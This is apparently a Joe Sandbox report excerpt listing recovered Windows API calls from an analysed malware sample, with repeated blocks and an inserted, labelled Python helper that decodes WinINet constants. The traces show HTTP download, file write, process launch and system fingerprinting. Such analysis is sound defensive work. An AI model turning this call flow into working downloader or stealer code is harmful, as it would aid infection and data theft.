                                                          • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                          • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0082B8A0), ref: 00406303
                                                          • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                          • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0082B1A0,00000000,00000000,00400100,00000000), ref: 00406385
                                                          • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                          • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                        • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                        • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                        • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                        • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                        • API String ID: 3532888709-1526165396
                                                        • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                        • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                        • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                        • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                          • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                          • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                          • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                        • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                        • StrCmpCA.SHLWAPI(?,0082B8A0), ref: 00406147
                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                        • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                        • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                        • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                        • String ID: a+A$a+A
                                                        • API String ID: 4287319946-2847607090
                                                        • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                        • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                        • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                        • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • memset.MSVCRT ref: 00B30E83
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30E9C
                                                        • lstrcat.KERNEL32(?,00420D7C), ref: 00B30EAE
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30EC4
                                                        • lstrcat.KERNEL32(?,00420D80), ref: 00B30ED6
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30EEF
                                                        • lstrcat.KERNEL32(?,00420D84), ref: 00B30F01
                                                        • lstrlen.KERNEL32(?), ref: 00B30F0E
                                                        • memset.MSVCRT ref: 00B30F34
                                                        • memset.MSVCRT ref: 00B30F48
                                                          • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                          • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B39927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B30DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B39948
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B30FC1
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B30FCD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                        • String ID:
                                                        • API String ID: 1395395982-0
                                                        • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                        • Instruction ID: 078b8227323d7ce072172e9a6f224f058a06a76a9eda6bbfc69caa513aba8b88
                                                        • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                        • Instruction Fuzzy Hash: B181C8B55002186BCB14FBA0DD92FED77B9AF44704F6041E8B34566092EF746B88CF5A
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • memset.MSVCRT ref: 00B30E83
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30E9C
                                                        • lstrcat.KERNEL32(?,00420D7C), ref: 00B30EAE
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30EC4
                                                        • lstrcat.KERNEL32(?,00420D80), ref: 00B30ED6
                                                        • lstrcat.KERNEL32(?,00000000), ref: 00B30EEF
                                                        • lstrcat.KERNEL32(?,00420D84), ref: 00B30F01
                                                        • lstrlen.KERNEL32(?), ref: 00B30F0E
                                                        • memset.MSVCRT ref: 00B30F34
                                                        • memset.MSVCRT ref: 00B30F48
                                                          • Part of subcall function 00B3AA87: lstrlen.KERNEL32(00B2516C,?,?,00B2516C,00420DDE), ref: 00B3AA92
                                                          • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                          • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B39927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B30DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B39948
                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B30FC1
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B30FCD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                        • String ID:
                                                        • API String ID: 1395395982-0
                                                        • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                        • Instruction ID: 179be65b2f9b5934b8b66c3e32d475b3c9dc31cfff57507803a876e3c240b3bf
                                                        • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                        • Instruction Fuzzy Hash: 9861D5B5500218ABCB14EBA0CD86FED77B8AF44704F6041E9F74566092EF702B88CF5A
                                                        APIs
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                          • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                          • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B24B7C
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B24BA1
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B24D21
                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 00B2504F
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B2506B
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B2507F
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B250B0
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B25114
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B2512C
                                                        • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B24D7C
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B25136
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                        • String ID:
                                                        • API String ID: 2402878923-0
                                                        • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                        • Instruction ID: 828ff600b8ed1b9be05a2547ea1ef62d3a7b78ea93cf9cc4de2f514b51a24167
                                                        • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                        • Instruction Fuzzy Hash: E712BC72910218ABCB15EB90DD92EEEB7B9AF16701F7051D9B14672091EF702F88CF52
                                                        APIs
                                                          • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                          • Part of subcall function 00B24A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                          • Part of subcall function 00B24A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                          • Part of subcall function 00B24A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B26548
                                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B2656A
                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B2659C
                                                        • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B265EC
                                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B26626
                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B26638
                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B26664
                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B266D4
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B26756
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B26760
                                                        • InternetCloseHandle.WININET(00000000), ref: 00B2676A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                        • String ID:
                                                        • API String ID: 3074848878-0
                                                        • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                        • Instruction ID: 4d777138341f61c41cf6df43609235864ae8b5739696a23cef825e035e4c1199
                                                        • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                        • Instruction Fuzzy Hash: 1F714F75A40218ABDB24DFA0DC89BEE77B5FB45700F204199F50A6B190DBB46E84CF42
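The numeric arguments in the WinINet call lines above are raw 32-bit values as the sandbox captured them; the service type passed to InternetConnectA, the flags passed to HttpOpenRequestA, the option passed to InternetSetOptionA and the info level passed to HttpQueryInfoA are all documented Windows SDK constants, as are the access masks that OpenProcess and RegOpenKeyExA receive elsewhere in this listing. The following Python script is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's `Api.MODULE(args), ref: address` shape and maps the arguments it has a table for to their symbolic names (for instance HttpOpenRequestA's 00400100 to INTERNET_FLAG_KEEP_CONNECTION plus INTERNET_FLAG_PRAGMA_NOCACHE, and InternetConnectA's 00000003 to INTERNET_SERVICE_HTTP). The sample lines embedded in it are copied from this report; the constant tables cover only the values that occur here and are an assumption about which arguments matter.

```python
"""Decode the numeric arguments in Joe Sandbox 'APIs' call lines.

Added example, not part of the Joe Sandbox report or of the analysed sample.
SAMPLE is copied from call lines in this report; the constant tables hold the
documented Windows SDK values (wininet.h, winnt.h, winreg.h) for the arguments
that occur here. '?' marks an argument the sandbox did not resolve.
"""
import re

# Report line shape: "Api.MODULE(arg,arg,...), ref: ADDRESS"; some entries
# (e.g. "wsprintfA.USER32 ref: ...") carry no argument list at all.
API_LINE = re.compile(
    r"^(?P<api>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Enumerations: exactly one meaning per value, keyed by (API, argument index).
ENUMS = {
    ("InternetOpenA", 1): {0: "INTERNET_OPEN_TYPE_PRECONFIG",
                           1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"},
    ("InternetConnectA", 5): {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"},
    ("InternetSetOptionA", 1): {31: "INTERNET_OPTION_SECURITY_FLAGS"},
    ("HttpQueryInfoA", 1): {19: "HTTP_QUERY_STATUS_CODE"},
    ("RegOpenKeyExA", 0): {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"},
    ("CreateFileA", 4): {2: "CREATE_ALWAYS", 3: "OPEN_EXISTING"},
}

# Bit masks, decoded greedily from the widest value down so that composite
# rights (PROCESS_ALL_ACCESS, KEY_READ) are named as a whole.
WININET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
FLAGS = {
    ("HttpOpenRequestA", 6): WININET_FLAGS,
    ("InternetOpenUrlA", 4): WININET_FLAGS,
    ("OpenProcess", 0): {0x001FFFFF: "PROCESS_ALL_ACCESS",
                         0x0400: "PROCESS_QUERY_INFORMATION", 0x0010: "PROCESS_VM_READ"},
    ("RegOpenKeyExA", 3): {0xF003F: "KEY_ALL_ACCESS", 0x20019: "KEY_READ", 0x20006: "KEY_WRITE"},
    ("CreateFileA", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileA", 2): {4: "FILE_SHARE_DELETE", 2: "FILE_SHARE_WRITE", 1: "FILE_SHARE_READ"},
}


def parse_api_line(line):
    """Return (api, module, [args], ref) or None when the line is not a call."""
    text = re.sub(r"^Part of subcall function [0-9A-Fa-f]+:\s*", "",
                  line.strip().lstrip("\u2022").strip())
    m = API_LINE.match(text)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return m.group("api"), m.group("module"), args, m.group("ref")


def _as_int(arg):
    """Sandbox arguments are 8-hex-digit words; '?' and literal strings give None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def _decode_flags(value, table):
    """Greedy bit-mask decoding; bits with no name are reported as UNKNOWN."""
    names, left = [], value
    for bits in sorted(table, reverse=True):
        if bits and (left & bits) == bits:
            names.append(table[bits])
            left &= ~bits
    if left:
        names.append(f"UNKNOWN_0x{left:X}")
    return names


def decode_call(line):
    """Map the decodable arguments of one call line to symbolic names.

    Returns {'api', 'ref', 'decoded': {arg_index: name or [names]}} or None.
    """
    parsed = parse_api_line(line)
    if parsed is None:
        return None
    api, _module, args, ref = parsed
    decoded = {}
    for i, arg in enumerate(args):
        value = _as_int(arg)
        if value is None:
            continue
        if (api, i) in ENUMS:
            decoded[i] = ENUMS[(api, i)].get(value, f"UNKNOWN_0x{value:X}")
        elif (api, i) in FLAGS:
            decoded[i] = _decode_flags(value, FLAGS[(api, i)])
    return {"api": api, "ref": ref, "decoded": decoded}


def decode_listing(text):
    """Decode every call line in a block of report text; skips non-call lines."""
    return [r for r in (decode_call(l) for l in text.splitlines()) if r]


# Constructed input: call lines copied verbatim from this report.
SAMPLE = """\
\u2022 InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B26548
\u2022 InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B2659C
\u2022 HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B265EC
\u2022 InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B26626
\u2022 HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B26664
\u2022 OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
\u2022 RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
\u2022 wsprintfA.USER32 ref: 00B378A7
"""

if __name__ == "__main__":
    for rec in decode_listing(SAMPLE):
        print(rec["api"], rec["ref"], rec["decoded"])
```

The decoder is deliberately position-based: the same value means different things in different argument slots, so a table keyed only by value would mislabel, for example, the 00000003 share mode of CreateFileA as INTERNET_SERVICE_HTTP. Extend ENUMS and FLAGS with further (API, index) pairs as you meet them in other reports.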
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B392D3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateGlobalStream
                                                        • String ID:
                                                        • API String ID: 2244384528-0
                                                        • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                        • Instruction ID: 5966374d502412c3292cc96ae32d5b4054e6d03e6b401c452cff03511bd92a72
                                                        • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                        • Instruction Fuzzy Hash: 12710AB9A40208ABDB14EFE4DC89FEEB7B9FF49300F108548F515A7294DB74A905CB61
                                                        APIs
                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                        • memset.MSVCRT ref: 0041716A
                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                        Strings
                                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                        • sA, xrefs: 004172AE, 00417179, 0041717C
                                                        • sA, xrefs: 00417111
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                         • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: OpenProcesslstrcpymemset
                                                        • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                        • API String ID: 224852652-2614523144
                                                        • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                        • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                        • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                        • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                        APIs
                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B377A9
                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B377E6
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3786A
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B37871
                                                        • wsprintfA.USER32 ref: 00B378A7
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                        • String ID: :$C$\$B
                                                        • API String ID: 1544550907-183544611
                                                        • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction ID: 2fb5902c9d1cdd5ad8ccdf01bb722070bbb23491073ea4392684e78739ec770e
                                                        • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction Fuzzy Hash: 684182B1D44258EBDB10DF94CC85BEEBBB9EF48700F200199F505A7280DB756A84CBA6
                                                        APIs
